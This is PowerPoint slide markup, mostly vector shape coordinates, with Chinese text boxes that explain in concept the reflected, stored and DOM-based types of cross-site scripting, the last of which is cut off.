                  <a:pt x="602" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="572" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="102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lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1890">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 104"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="765917" y="4500899"/>
            <a:ext cx="2743676" cy="953871"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 618 w 620"/>
              <a:gd name="T1" fmla="*/ 72 h 185"/>
              <a:gd name="T2" fmla="*/ 587 w 620"/>
              <a:gd name="T3" fmla="*/ 35 h 185"/>
              <a:gd name="T4" fmla="*/ 565 w 620"/>
              <a:gd name="T5" fmla="*/ 18 h 185"/>
              <a:gd name="T6" fmla="*/ 598 w 620"/>
              <a:gd name="T7" fmla="*/ 95 h 185"/>
              <a:gd name="T8" fmla="*/ 560 w 620"/>
              <a:gd name="T9" fmla="*/ 152 h 185"/>
              <a:gd name="T10" fmla="*/ 492 w 620"/>
              <a:gd name="T11" fmla="*/ 168 h 185"/>
              <a:gd name="T12" fmla="*/ 338 w 620"/>
              <a:gd name="T13" fmla="*/ 168 h 185"/>
              <a:gd name="T14" fmla="*/ 144 w 620"/>
              <a:gd name="T15" fmla="*/ 164 h 185"/>
              <a:gd name="T16" fmla="*/ 37 w 620"/>
              <a:gd name="T17" fmla="*/ 170 h 185"/>
              <a:gd name="T18" fmla="*/ 279 w 620"/>
              <a:gd name="T19" fmla="*/ 168 h 185"/>
              <a:gd name="T20" fmla="*/ 413 w 620"/>
              <a:gd name="T21" fmla="*/ 171 h 185"/>
              <a:gd name="T22" fmla="*/ 516 w 620"/>
              <a:gd name="T23" fmla="*/ 171 h 185"/>
              <a:gd name="T24" fmla="*/ 543 w 620"/>
              <a:gd name="T25" fmla="*/ 170 h 185"/>
              <a:gd name="T26" fmla="*/ 549 w 620"/>
              <a:gd name="T27" fmla="*/ 170 h 185"/>
              <a:gd name="T28" fmla="*/ 408 w 620"/>
              <a:gd name="T29" fmla="*/ 178 h 185"/>
              <a:gd name="T30" fmla="*/ 267 w 620"/>
              <a:gd name="T31" fmla="*/ 182 h 185"/>
              <a:gd name="T32" fmla="*/ 132 w 620"/>
              <a:gd name="T33" fmla="*/ 179 h 185"/>
              <a:gd name="T34" fmla="*/ 13 w 620"/>
              <a:gd name="T35" fmla="*/ 181 h 185"/>
              <a:gd name="T36" fmla="*/ 2 w 620"/>
              <a:gd name="T37" fmla="*/ 177 h 185"/>
              <a:gd name="T38" fmla="*/ 9 w 620"/>
              <a:gd name="T39" fmla="*/ 159 h 185"/>
              <a:gd name="T40" fmla="*/ 66 w 620"/>
              <a:gd name="T41" fmla="*/ 102 h 185"/>
              <a:gd name="T42" fmla="*/ 48 w 620"/>
              <a:gd name="T43" fmla="*/ 60 h 185"/>
              <a:gd name="T44" fmla="*/ 56 w 620"/>
              <a:gd name="T45" fmla="*/ 17 h 185"/>
              <a:gd name="T46" fmla="*/ 194 w 620"/>
              <a:gd name="T47" fmla="*/ 14 h 185"/>
              <a:gd name="T48" fmla="*/ 282 w 620"/>
              <a:gd name="T49" fmla="*/ 7 h 185"/>
              <a:gd name="T50" fmla="*/ 429 w 620"/>
              <a:gd name="T51" fmla="*/ 9 h 185"/>
              <a:gd name="T52" fmla="*/ 536 w 620"/>
              <a:gd name="T53" fmla="*/ 3 h 185"/>
              <a:gd name="T54" fmla="*/ 494 w 620"/>
              <a:gd name="T55" fmla="*/ 2 h 185"/>
              <a:gd name="T56" fmla="*/ 330 w 620"/>
              <a:gd name="T57" fmla="*/ 5 h 185"/>
              <a:gd name="T58" fmla="*/ 217 w 620"/>
              <a:gd name="T59" fmla="*/ 9 h 185"/>
              <a:gd name="T60" fmla="*/ 78 w 620"/>
              <a:gd name="T61" fmla="*/ 10 h 185"/>
              <a:gd name="T62" fmla="*/ 26 w 620"/>
              <a:gd name="T63" fmla="*/ 21 h 185"/>
              <a:gd name="T64" fmla="*/ 23 w 620"/>
              <a:gd name="T65" fmla="*/ 20 h 185"/>
              <a:gd name="T66" fmla="*/ 19 w 620"/>
              <a:gd name="T67" fmla="*/ 32 h 185"/>
              <a:gd name="T68" fmla="*/ 27 w 620"/>
              <a:gd name="T69" fmla="*/ 51 h 185"/>
              <a:gd name="T70" fmla="*/ 56 w 620"/>
              <a:gd name="T71" fmla="*/ 100 h 185"/>
              <a:gd name="T72" fmla="*/ 11 w 620"/>
              <a:gd name="T73" fmla="*/ 153 h 185"/>
              <a:gd name="T74" fmla="*/ 0 w 620"/>
              <a:gd name="T75" fmla="*/ 173 h 185"/>
              <a:gd name="T76" fmla="*/ 0 w 620"/>
              <a:gd name="T77" fmla="*/ 185 h 185"/>
              <a:gd name="T78" fmla="*/ 7 w 620"/>
              <a:gd name="T79" fmla="*/ 182 h 185"/>
              <a:gd name="T80" fmla="*/ 97 w 620"/>
              <a:gd name="T81" fmla="*/ 181 h 185"/>
              <a:gd name="T82" fmla="*/ 231 w 620"/>
              <a:gd name="T83" fmla="*/ 185 h 185"/>
              <a:gd name="T84" fmla="*/ 370 w 620"/>
              <a:gd name="T85" fmla="*/ 184 h 185"/>
              <a:gd name="T86" fmla="*/ 549 w 620"/>
              <a:gd name="T87" fmla="*/ 181 h 185"/>
              <a:gd name="T88" fmla="*/ 557 w 620"/>
              <a:gd name="T89" fmla="*/ 171 h 185"/>
              <a:gd name="T90" fmla="*/ 611 w 620"/>
              <a:gd name="T91" fmla="*/ 94 h 185"/>
              <a:gd name="T92" fmla="*/ 620 w 620"/>
              <a:gd name="T93" fmla="*/ 82 h 185"/>
              <a:gd name="T94" fmla="*/ 44 w 620"/>
              <a:gd name="T95" fmla="*/ 76 h 185"/>
              <a:gd name="T96" fmla="*/ 26 w 620"/>
              <a:gd name="T97" fmla="*/ 35 h 185"/>
              <a:gd name="T98" fmla="*/ 24 w 620"/>
              <a:gd name="T99" fmla="*/ 24 h 185"/>
              <a:gd name="T100" fmla="*/ 60 w 620"/>
              <a:gd name="T101" fmla="*/ 94 h 185"/>
              <a:gd name="T102" fmla="*/ 59 w 620"/>
              <a:gd name="T103" fmla="*/ 105 h 185"/>
              <a:gd name="T104" fmla="*/ 602 w 620"/>
              <a:gd name="T105" fmla="*/ 102 h 185"/>
              <a:gd name="T106" fmla="*/ 552 w 620"/>
              <a:gd name="T107" fmla="*/ 173 h 185"/>
              <a:gd name="T108" fmla="*/ 558 w 620"/>
              <a:gd name="T109" fmla="*/ 164 h 185"/>
              <a:gd name="T110" fmla="*/ 553 w 620"/>
              <a:gd name="T111" fmla="*/ 163 h 185"/>
              <a:gd name="T112" fmla="*/ 553 w 620"/>
              <a:gd name="T113" fmla="*/ 163 h 185"/>
              <a:gd name="T114" fmla="*/ 607 w 620"/>
              <a:gd name="T115" fmla="*/ 89 h 185"/>
              <a:gd name="T116" fmla="*/ 616 w 620"/>
              <a:gd name="T117" fmla="*/ 83 h 185"/>
              <a:gd name="T118" fmla="*/ 602 w 620"/>
              <a:gd name="T119" fmla="*/ 102 h 18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620" h="185">
                <a:moveTo>
                  <a:pt x="620" y="80"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="620" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="569" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574" y="128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="560" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="543" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="491" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="443" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="557" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="563" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="80"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="44" y="76"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="44" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="76"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="602" y="102"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="602" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="572" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="102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lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1890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971683" y="1517076"/>
            <a:ext cx="122348" cy="122348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0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971683" y="1315711"/>
            <a:ext cx="122348" cy="122348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0">
              <a:solidFill>
                <a:schemeClr val="tx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971683" y="2954441"/>
            <a:ext cx="122348" cy="122348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0">
              <a:solidFill>
                <a:schemeClr val="tx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971683" y="2753076"/>
            <a:ext cx="122348" cy="122348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0">
              <a:solidFill>
                <a:schemeClr val="tx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971683" y="4282961"/>
            <a:ext cx="122348" cy="122348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0">
              <a:solidFill>
                <a:schemeClr val="tx1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971683" y="4081596"/>
            <a:ext cx="122348" cy="122348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0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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1343660" y="2007235"/>
            <a:ext cx="1379220" cy="3816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9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反射型XSS    </a:t>
            </a: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1386840" y="3345180"/>
            <a:ext cx="1387475" cy="3816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9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存储型XSS    </a:t>
            </a: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1324555" y="4786896"/>
            <a:ext cx="1512570" cy="3816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9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DOM型XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051300" y="1869440"/>
            <a:ext cx="6478270" cy="694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反射型XSS只是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1325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简单地把用户输入的数据“反射”给浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr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。也就是说，黑客往往 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr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需要</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1325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诱使用户“点击”一个恶意链接</a:t>
            </a:r>
            <a:r>
              <a:rPr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，才能攻击成功。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr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反射型XSS也叫做“非持久型XSS”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"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sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051300" y="3016885"/>
            <a:ext cx="6478905" cy="11842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en-US"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存储型XSS会</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1325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把用户输入的数据“存储”在服务器端</a:t>
            </a:r>
            <a:r>
              <a:rPr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 defTabSz="1216660">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr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例如</a:t>
            </a:r>
            <a:r>
              <a:rPr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，黑客写下一篇包含有恶意JavaScript代码的博客文章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"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文章发表后，所有访</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1216660">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr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问该博客文章的用户，都会在他们的浏览器中执行这段恶意的JavaScript代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1216660">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr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黑客把恶意的脚本保存到服务器端，所以叫“存储型XSS”。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1216660">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr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存储型XSS通常也叫做“持久型XSS”。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="1325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4051300" y="4630420"/>
            <a:ext cx="6478905" cy="694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en-US"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这种类型并非按照“数据是否保存在服务器端”来划分，DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"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型</a:t>
            </a:r>
